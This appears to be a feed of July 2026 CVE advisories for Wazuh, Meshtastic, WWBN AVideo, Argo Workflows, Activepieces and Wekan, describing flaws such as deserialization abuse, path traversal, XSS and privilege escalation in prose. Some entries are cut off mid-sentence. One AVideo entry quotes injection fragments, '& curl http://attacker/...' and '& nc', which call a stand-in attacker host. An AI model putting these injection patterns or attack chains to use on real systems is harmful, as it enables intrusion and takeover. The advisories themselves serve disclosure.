Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to version 4.14.5, issues in the Cluster Distributed API (DAPI) handling allow a cluster peer, or any actor able to authenticate to the cluster channel using the shared cluster key, to make the master node deserialize an attacker-controlled callable and execute it under an attacker-controlled RBAC context. The cluster code in `framework/wazuh/core/cluster/common.py` deserializes JSON with `as_wazuh_object()`, which resolves any callable whose top-level package is wazuh or api (an overly broad allowlist controlled only by `ALLOWED_CALLABLES_PACKAGES`), and DAPI requests handled in framework/wazuh/core/cluster/dapi/dapi.py accept a client-supplied rbac_permissions value that `run_local()` applies as the global RBAC context, so supplying an rbac_mode of black causes authorization checks for expose_resources-protected functions to pass without any legitimate permission assignment. Combined, these allow privileged administrative actions on the master node such as arbitrary file writes under WAZUH_PATH, creation of new API users, and tampering with security.yaml, and can be chained into fu

  • Jul 19, 2026Meshtastic is an open source mesh networking solution.CVE-2026-44359 · Other software · meshtastic · reported by GitHubCritical 10

Meshtastic is an open source mesh networking solution. Prior to version 2.7.21.1370b23, the Meshtastic GitHub repository's main_matrix.yml workflow is triggered by pull_request_target and multiple jobs check out the attacker's fork code and execute it with access to repository secrets and elevated GITHUB_TOKEN permissions. No approval gate exists. Pull requests from external users with author_association: "NONE" triggered the CI workflow automatically. The workflow directly executes attacker-controlled files from the fork checkout. This issue could have resulted in supply chain compromise, self-hosted runner compromise, and/or repository takeover for the repo. This issue is separate from GHSA-6mwm-v2vv-pp96, which addressed a command injection via github.head_ref in the setup job of the same workflow. That fix correctly moved to environment variables. However, the more critical fork checkout vulnerability across the check, build, and build-debian-src jobs was not addressed. Version 2.7.21.1370b23 contains a patch for thie issue.

  • Jul 19, 2026Meshtastic is an open source mesh networking solution.CVE-2026-42566 · Other software · meshtastic · reported by GitHubHigh 7.5

Meshtastic is an open source mesh networking solution. Prior to version 2.7.23.b246bcd, a single node advertising a User.long_name that contains a malformed character encoding can render other radios unusable over BLE when managed through the iOS app. The malformed name does not need to be maliciously crafted — it can arise from ordinary buffer truncation and has been observed occurring naturally in the wild. At least one code path could place a null terminator in the middle of a multibyte sequence, leaving a malformed User.long_name in the node database. The problem surfaced downstream: the iOS app enforced encoding validation and therefore cannot parse a node database once it contains a poisoned entry. This caused BLE sync to enter a fail/retry loop, resulting in loss of control over the affected device. For a typical user managing their radio with the iOS app, the device becomes effectively unusable until the poisoned node ages out of the on-device database, or unless they have an alternate management path (e.g., the Python CLI, which can be used to identify and remove the offending entries manually). Because the malformed name propagates through the mesh, the temporary presence

Wazuh is a free and open source platform used for threat prevention, detection, and response. In versions 3.0.0 and above, prior to 4.14.5, a size_t integer underflow in os_crypto/shared/msgs.c:389 allows any enrolled Wazuh agent to crash the wazuh-remoted process on the manager, immediately disconnecting all agents from the manager. • Jul 16, 2026Wazuh is a free and open source platform used for threat prevention, detection, and response.CVE-2026-40106 · Other software · wazuh · reported by GitHubMedium 4.7

Wazuh is a free and open source platform used for threat prevention, detection, and response. Versions 4.6.0 and above prior to 4.14.5 contain a heap-based buffer overflow vulnerability in the syscheck component of the Wazuh agent for Windows. When expanding registry paths containing wildcards (* or ?), the agent allocates a fixed-size heap buffer of 256 bytes (OS_SIZE_256). By creating a registry subkey with a maximum allowed length (255 characters) inside a monitored path, a low-privileged local attacker can force an out-of-bounds write during string concatenation. Since wazuh-agent.exe runs as NT AUTHORITY\SYSTEM, this can lead to a silent Denial of Service (blinding the agent) or potentially Local Privilege Escalation (LPE). This issue has been fixed in version 4.14.5.

  • Jul 16, 2026Wazuh is a free and open source platform used for threat prevention, detection, and response.CVE-2026-39359 · Other software · wazuh · reported by GitHubHigh 7.5

Wazuh is a free and open source platform used for threat prevention, detection, and response. In versions 4.0.0 through 4.10.3 and 4.11.0 through 4.14.4, a logic flaw affects the Wazuh Manager's enrollment daemon (authd) and synchronization daemon (remoted). The authd process allows agents to select a group during enrollment but does not filter path traversal sequences such as "..." While the manager checks for the group directory using wopendir(), the ".." sequence references the parent directory (/var/ossec/etc), allowing it to pass validation. After the malicious group is accepted and stored in the manager's global database, the remoted process uses this unchecked value to build paths for agent configuration synchronization. As a result, sensitive files from /var/ossec/etc, such as client.keys, ossec.conf, and internal certificates, are included in the agent's shared configuration stream and exposed to the attacker. This issue has been fixed in versions 4.10.4 and 4.14.5.

Wazuh is a free and open source platform used for threat prevention, detection, and response. In versions 1.0.0 and above, prior to 4.14.5, a heap buffer overflow in wazuh-analysisd allows an unauthenticated remote attacker to crash the Wazuh manager's analysis engine, causing complete loss of SIEM alert processing. The attack exploits the default configuration shipped in the official wazuh/wazuh-docker deployment with default configuration. An attacker can enroll with authd without a password to obtain a valid agent ID and encryption key, connect to remoted over the Wazuh agent protocol, and inject rootcheck events containing  {key: value}  patterns longer than 30 bytes that trigger a sprintf overflow of a 30-byte buffer in W_JSON_ParseRootcheck, corrupting the heap and crashing wazuh-analysisd so that all alert processing silently stops while the dashboard and API keep showing stale data.

Wazuh is a free and open source platform used for threat prevention, detection, and response. In versions 3.9.0 and above, prior to 4.14.5, a remote attacker can trigger memory exhaustion in the cluster protocol parser by sending a crafted message header with an arbitrarily large payload length. Wazuh is a free and open source platform used for threat prevention, detection, and response. In versions 4.6.0 and above, prior to 4.14.5, a logic error in CheckRateLimitsMiddleware.dispatch() causes the /events endpoint rate check to unconditionally overwrite the general rate limit result. When the global max_request_per_minute is exceeded, requests to /events still succeed if the events-specific counter (hardcoded 30/min) has not been reached. WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single & ( the shell background operator). CVE-2026-33482 reported that sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) failed to strip $(...) command substitution, allowing OS command injection at the execAsync() sh -c sink. The fix (commit 25c8ab90) added $, (, ), {, }, \n, \r to the denylist character class and a str_replace('&&', '', ...), but did not account for the single &. ffmpeg.json.php builds the command from _decryptString(getInput('codeToExecEncrypted')). This is the same threat model the original advisory accepted (“an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server”) and the same CVSS basis (AV:N/AC:H/PR:N). Multiple &-separated commands can be chained (e.g. download + execute). Redirect-based payloads are blocked by the > strip, but command execution (e.g. & curl http://attacker/..., & nc ..., dropping/running a file) is not. • Jul 16, 2026WWBN AVideo is an open source video platform.CVE-2026-33731 · Other software · WWBN · reported by GitHubMedium 6.5

WWBN AVideo is an open source video platform. In versions prior to 29.0, the Authorize.Net webhook handler at plugin/AuthorizeNet/webhook.php contains a signature verification bypass that allows an attacker to forge webhook requests with arbitrary payment amounts and target user IDs. By supplying a valid transaction ID from a small legitimate purchase, the attacker bypasses signature validation and credits arbitrary wallet balances to any user account via attacker-controlled payload fields. Three flaws combine into an exploit chain: signature bypass via OR logic (webhook.php:33), payload values override API-fetched values (AuthorizeNet.php:169-171, webhook.php:44-48) and a missing approval check (webhook.php:61-75). By forging payment metadata, an attacker can credit arbitrary amounts to any user's wallet without a corresponding payment and include a  plans_id  to activate premium subscriptions (webhook.php:86-134), enabling free access to all paid and premium content and causing direct revenue loss to the platform owner. WWBN AVideo is an open source video platform. Versions prior to 29.0 expose .env files to unauthenticated users through the official Docker compose configuration. The official docker-compose.yml mounts the entire project root directory as the Apache document root, causing the .env file — which contains database credentials, admin passwords, and infrastructure configuration — to be served as a static file at /.env. No .htaccess rule or Apache configuration blocks access to dotfiles. Exploitation enables direct database access, admin panel takeover, and further lateral movement within the Docker network. Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to 3.7.15 and 4.0.6, the allow-list fix for CVE-2026-31892 is incomplete because workflow/util/merge.go ValidateUserOverrides and SanitizeUserWorkflowSpec walk only the top-level fields of WorkflowSpec via reflection, and WorkflowSpec.ArtifactGC is allow-listed wholesale; the struct behind that field, WorkflowLevelArtifactGC, has a PodSpecPatch sub-field whose contents flow unmodified into util.ApplyPodSpecPatch on the artifact-GC pod, the same sink the original fix closed for WorkflowSpec.PodSpecPatch, so a user submitting a Workflow under templateReferencing: Strict or Secure (against a referenced WorkflowTemplate that declares an output artifact and setting spec.artifactGC.strategy: OnWorkflowCompletion) can still inject an arbitrary strategic merge patch into the artifact-GC pod, including hostPath volumes, privileged: true, arbitrary image and command, and hostNetwork: true, defeating the stated purpose of Strict/Secure reference mode. Prior to 0.83.0, the /v1/step-files/signed download endpoint verified the supplied JWT against the shared signing secret but did not check the token's audience, and combined with a missing null-check on the decoded fileId, this allowed any caller holding any valid Activepieces JWT (including a freshly created user's own access token) to receive a step-file belonging to another tenant. The file returned was whatever PostgreSQL happened to scan first for type = FLOW_STEP_FILE, varying over time as the database changed, so an authenticated user could obtain step-file attachments belonging to other tenants on the same instance; the attacker could not target a specific victim or file, and the access was read-only with no integrity or availability impact. Activepieces is an open source AI workflow automation platform. Prior to 0.82.0, the git-sync feature clones a user-configured Git repository into a temporary directory on the server and then writes flow, table, and connection state into it before pushing back, and two separate weaknesses allowed those writes to escape the intended workspace and land on arbitrary paths on the host filesystem: Git's symbolic-link handling was not disabled on the clone, so an attacker who controlled the remote repository could include symlinks that redirected the writes, and several user-supplied identifiers used to build on-disk paths (the repository slug and the externalId of tables, flows, and connections) were not validated against directory-traversal sequences such as ../. On a self-hosted Enterprise Edition deployment, a user authorized to configure or push to a git-sync repository (holding the WRITE_PROJECT_RELEASE permission) could cause the server to overwrite files anywhere the Activepieces process user can write, which depending on host layout can be leveraged for tampering, denial of service, or remote code execution. This issue is fixed in version 0.82.0.

Prior to 9.32, Wekan webhook integration URLs in models/integrations.js are stored from user input and later fetched by server/notifications/outgoing.js without applying the existing validateAttachmentUrl() private-network checks from models/lib/attachmentUrlValidation.js. A board administrator can configure webhook URLs that cause server-side requests to internal or metadata services. This issue is fixed in version 9.32.

Wekan is open source kanban built with Meteor. Prior to 9.32, the Wekan copyBoard Meteor DDP method in server/publications/boards.js copies a board by caller-supplied board ID without checking this.userId, membership, or admin access. Any authenticated user can copy a private board they are not a member of, including its cards, checklists, custom fields, labels, and rules, while the REST POST /api/boards/:boardId/copy path correctly checks board admin access. This issue is fixed in version 9.32.

Prior to 9.32, Wekan OIDC-related Meteor methods in packages/wekan-oidc/oidc_server.js, server/models/org.js, and server/models/team.js are globally callable without the admin authorization checks used by their non-OIDC counterparts. Authenticated users can call setCreateOrgFromOidc, setOrgAllFieldsFromOidc, setCreateTeamFromOidc, setTeamAllFieldsFromOidc, boardRoutineOnLogin, or groupRoutineOnLogin to create or modify organizations and teams, and groupRoutineOnLogin can grant global admin privileges when PROPAGATE_OIDC_DATA is enabled. Wekan is open source kanban built with Meteor. Prior to 9.32, the Wekan Accounts.onCreateUser hook in server/models/users.js merges OIDC logins into existing accounts when the OIDC email or username matches an existing Wekan user, without verifying ownership or checking email_verified. An attacker using an OIDC provider account with a victim's email or username can cause Wekan to merge the attacker's OIDC credentials into the victim account and then log in as that account. Wekan is open source kanban built with Meteor. Prior to 9.07, Wekan avatar upload functionality embeds user-supplied filenames into paths later passed to child_process.exec() for MIME-type detection. Wekan is open source kanban built with Meteor. Prior to 9.31, Wekan allows a logged-in board member to insert an attachment document through the /attachments/insert DDP method with attacker-controlled versions.original.path and versions.original.storage fields. The server/permissions/attachments.js insert rule checks only board write access, and FileStoreStrategyFilesystem.getReadStream() in models/lib/fileStoreStrategy.js streams the stored path without a storage-root containment check, allowing arbitrary file reads and denial of service through special files such as /dev/zero. • Jul 15, 2026WWBN AVideo is an open source video platform.CVE-2026-50183 · Other software · WWBN · reported by GitHubMedium 4.7

WWBN AVideo is an open source video platform. Versions 29.0 and below contain a stored Cross-Site Scripting vulnerability in the YouTubeAPI plugin. The plugin renders the snippet.title field returned by the YouTube Data API into the homepage gallery markup with no HTML encoding. The title is set by the YouTube video uploader (anyone in the world) and is treated by AVideo as trusted content. A YouTube uploader who controls a video matching the operator's configured query injects HTML into the AVideo homepage by setting their video's title to a JavaScript-bearing string; the payload then executes in the browser of every visitor who loads any page that renders the gallery. When the visitor is an AVideo administrator, the injected JavaScript performs any admin action (create user, promote to admin, change configuration, install plugin) that uses cookie-based authentication without an additional CSRF token, escalating the bug into full administrative takeover. The payload persists for the duration of cacheTimeout (default 3600 seconds) after the malicious title is set on YouTube and survives YouTube removing the hostile video for the same window. This issue has been addressed by commit

  • Jul 15, 2026WWBN AVideo is an open source video platform.CVE-2026-50182 · Other software · WWBN · reported by GitHubMedium 6.1

WWBN AVideo is an open source video platform. Versions prior to 29.0 contain an unauthenticated Reflected XSS vulnerability through AVideo YouTubeAPI Gallery Pagination. The $_GET['search'] query parameter is concatenated directly into the href attribute of two pagination links in plugin/YouTubeAPI/gallerySection.php (lines 67 and 74) with no htmlspecialchars, no urlencode, and no allow-list check. An injected <script> element is then extracted by the AVideo Layout plugin and concatenated into a single trailing inline script block at the bottom of the page, where the browser executes it. Any unauthenticated attacker can lure a victim into following a crafted URL to execute arbitrary JavaScript under the AVideo origin, which can read non-HttpOnly cookies and issue authenticated AJAX requests as the victim, and when the victim is an administrator, it can perform any cookie-authenticated admin action (create user, promote to admin, change configuration, install plugin), escalating a single click into full administrative takeover. This issue has been patched by this commit: https://github.com/WWBN/AVideo/commit/f50fc033b7adb36f1ffd6640e7826468bdafdec3.

  • Jul 15, 2026WWBN AVideo is an open source video platform.CVE-2026-49279 · Other software · WWBN · reported by GitHubHigh 7.7

WWBN AVideo is an open source video platform. Versions 29.0 and below contain a Stored XSS vulnerability through the autoEvalCodeOnHTML parameter in the MessageSQLite WebSocket Handler. The MessageSQLite.php handler only strips autoEvalCodeOnHTML from $json['msg'], but msgToResourceId() reads from $msg['json'] with higher priority. An attacker can place the XSS payload in the json key instead of msg, bypassing the sanitization entirely. An authenticated attacker can execute arbitrary JavaScript in any connected user's browser session via the WebSocket messaging system, stealing session cookies and authentication tokens, taking over accounts through session hijacking, and chaining with CSRF to perform admin actions on the victim's behalf, in the default SQLite WebSocket backend configuration. This issue has a patch that has yet to be officially released, see https://github.com/WWBN/AVideo/commit/3e0b3ce2bfa766183ff0ae227439394db57b1a23.

  • Jul 15, 2026WWBN AVideo is an open source video platform.CVE-2026-33684 · Other software · WWBN · reported by GitHubMedium 5.3

WWBN AVideo is an open source video platform. Prior to version 29.0, Privilege Escalation is possible through unguarded permission parameters in signUp API, which allows any user who can solve a CAPTCHA to self-grant elevated permissions during account registration. The set_api_signUp method in the API plugin accepts emailVerified, canUpload, canStream, and canCreateMeet parameters from user-supplied input and applies them to newly created accounts without verifying that the request was authenticated with a valid APISecret. By self-granting account attributes, attackers can mark their own accounts as email-verified without owning the address (bypassing email-gated functionality) and award themselves upload, streaming, and meeting-creation permissions, circumventing administrator access controls that intentionally restrict these capabilities for new users.
